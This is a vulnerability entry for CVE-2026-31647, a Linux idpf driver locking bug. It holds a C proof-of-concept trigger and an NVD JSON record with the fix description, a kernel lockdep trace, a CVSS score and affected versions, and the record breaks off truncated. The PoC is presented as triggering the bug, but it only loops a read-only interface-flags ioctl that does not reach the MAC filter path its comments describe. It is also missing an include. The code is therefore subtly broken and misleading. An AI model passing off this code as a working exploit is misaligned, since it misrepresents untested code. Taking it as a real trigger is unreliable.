CVE-2026-31647

/* * PoC for CVE-2026-31647 * This is a conceptual trigger for the idpf driver vulnerability. * Requires specific hardware (Intel Ethernet Controller) and kernel config (PREEMPT_RT). */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <linux/if.h> int main() { int sock; struct ifreq ifr; // Create a socket to interact with the network interface sock = socket(AF_INET, SOCK_DGRAM, 0); if (sock < 0) { perror("socket"); return 1; } // Attempt to trigger mac filter operations which utilize the async handler // This involves sending ioctls to the idpf driver interface memset(&ifr, 0, sizeof(ifr)); // Replace 'eth0' with the actual idpf interface name strncpy(ifr.ifr_name, "eth0", IFNAMSIZ - 1); // Rapidly toggling interface flags or MAC address changes may trigger the async path for(int i = 0; i < 1000; i++) { if (ioctl(sock, SIOCGIFFLAGS, &ifr) < 0) { perror("ioctl"); close(sock); return 1; } // Simulate workload that triggers async VC handling usleep(100); } close(sock); printf("PoC executed. Check kernel logs for 'Invalid wait context'.\n"); return 0; }

{"cve": {"id": "CVE-2026-31647", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-24T15:16:44.073", "lastModified": "2026-04-27T20:18:54.493", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nidpf: fix PREEMPT_RT raw/bh spinlock nesting for async VC handling\n\nSwitch from using the completion's raw spinlock to a local lock in the\nidpf_vc_xn struct. The conversion is safe because complete/_all() are\ncalled outside the lock and there is no reason to share the completion\nlock in the current logic. This avoids invalid wait context reported by\nthe kernel due to the async handler taking BH spinlock:\n\n[ 805.726977] =============================\n[ 805.726991] [ BUG: Invalid wait context ]\n[ 805.727006] 7.0.0-rc2-net-devq-031026+ #28 Tainted: G S OE\n[ 805.727026] -----------------------------\n[ 805.727038] kworker/u261:0/572 is trying to lock:\n[ 805.727051] ff190da6a8dbb6a0 (&vport_config->mac_filter_list_lock){+...}-{3:3}, at: idpf_mac_filter_async_handler+0xe9/0x260 [idpf]\n[ 805.727099] other info that might help us debug this:\n[ 805.727111] context-{5:5}\n[ 805.727119] 3 locks held by kworker/u261:0/572:\n[ 805.727132] #0: ff190da6db3e6148 ((wq_completion)idpf-0000:83:00.0-mbx){+.+.}-{0:0}, at: process_one_work+0x4b5/0x730\n[ 805.727163] #1: ff3c6f0a6131fe50 ((work_completion)(&(&adapter->mbx_task)->work)){+.+.}-{0:0}, at: process_one_work+0x1e5/0x730\n[ 805.727191] #2: ff190da765190020 (&x->wait#34){+.+.}-{2:2}, at: idpf_recv_mb_msg+0xc8/0x710 [idpf]\n[ 805.727218] stack backtrace:\n...\n[ 805.727238] Workqueue: idpf-0000:83:00.0-mbx idpf_mbx_task [idpf]\n[ 805.727247] Call Trace:\n[ 805.727249] <TASK>\n[ 805.727251] dump_stack_lvl+0x77/0xb0\n[ 805.727259] __lock_acquire+0xb3b/0x2290\n[ 805.727268] ? __irq_work_queue_local+0x59/0x130\n[ 805.727275] lock_acquire+0xc6/0x2f0\n[ 805.727277] ? idpf_mac_filter_async_handler+0xe9/0x260 [idpf]\n[ 805.727284] ? _printk+0x5b/0x80\n[ 805.727290] _raw_spin_lock_bh+0x38/0x50\n[ 805.727298] ? idpf_mac_filter_async_handler+0xe9/0x260 [idpf]\n[ 805.727303] idpf_mac_filter_async_handler+0xe9/0x260 [idpf]\n[ 805.727310] idpf_recv_mb_msg+0x1c8/0x710 [idpf]\n[ 805.727317] process_one_work+0x226/0x730\n[ 805.727322] worker_thread+0x19e/0x340\n[ 805.727325] ? __pfx_worker_thread+0x10/0x10\n[ 805.727328] kthread+0xf4/0x130\n[ 805.727333] ? __pfx_kthread+0x10/0x10\n[ 805.727336] ret_from_fork+0x32c/0x410\n[ 805.727345] ? __pfx_kthread+0x10/0x10\n[ 805.727347] ret_from_fork_asm+0x1a/0x30\n[ 805.727354] </TASK>"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.9.1", "versionEndExcluding": "6.12.83", "matchCriteriaId": "4A76C099-8DB9-474D-90CA-61674BD1ED6E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.23", "matchCriteriaId": "E9E09FDD-9EE3-4A56-92E2-2B30AFD0072F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.13", "matchCriteriaId": "1490EF9B-9080-481C-8D22-1306AAE664E4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.9:-:*:*:*:*:*:*", "matchCriteriaId": "3F2A4A3D-068A-4CF2-A09F-9C7937DDB0A5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "58A9FEFF-C040-420D-8F0A-BFDAAA1DF258"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc6:*:*:*:*:*:*", "matchCriteriaId": "1D2315C0-D46F-4F ... (truncated)